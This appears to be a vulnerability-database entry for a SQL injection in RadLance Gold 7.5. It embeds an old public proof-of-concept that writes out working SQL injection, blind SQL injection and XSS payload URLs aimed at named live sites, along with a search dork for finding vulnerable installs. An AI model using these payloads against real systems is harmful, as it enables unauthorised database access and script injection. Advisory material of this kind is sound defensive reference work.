CVE-2009-4695
high
CVSS v3
—
CVSS v4 NEW
—
VIR risk
8.5
Description
SQL injection vulnerability in index.php in RadScripts RadLance Gold 7.5 allows remote attackers to execute arbitrary SQL commands via the fid parameter in a view_forum action.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
radlance gold 7.5 - Multiple Vulnerabilities
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] RadLance Gold v7.5 Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ RadLance Gold v7.5 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.radscripts.com/freelancescripts/index.php ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Powered by: RadLance v7.5 ]
[»] Price: [ $199 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/index.php?a=view_forum&fid=[SQL]
[»] http://www.radlance.com/07.5s1/_plain/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
[»] http://www.excellance.net/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
RESULT : 5.0.67-community
===[ Exploit + LIVE : BLIND SQL vulnerability ]===
[»] http://www.site.com/patch/index.php?a=view_forum&fid=[BLIND]
[»] http://www.radlance.com/07.5s1/_plain/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE
http://www.radlance.com/07.5s1/_plain/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE
SO MYSQL: V5
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/index.php?a=ulist&pr=[XSS]&
[»] http://www.radlance.com/07.5s1/_plain/index.php?a=ulist&pr=1</title><ScRiPt %0A%0D>alert(566615539956)%3B</ScRiPt>&
[»] http://www.excellance.net/index.php?a=ulist&pr=1</title><ScRiPt %0A%0D>alert(566615539956)%3B</ScRiPt>&
Author: Moudi
###########################################################################
# milw0rm.com [2009-07-17]Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| radscripts | radlance | 7.5 | |
References
- http://secunia.com/advisories/35826
- http://www.exploit-db.com/exploits/9195
- http://www.osvdb.org/55948
- http://www.securityfocus.com/bid/35730
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51834
- http://secunia.com/advisories/35826
- http://www.exploit-db.com/exploits/9195
- http://www.osvdb.org/55948
- http://www.securityfocus.com/bid/35730
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51834
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.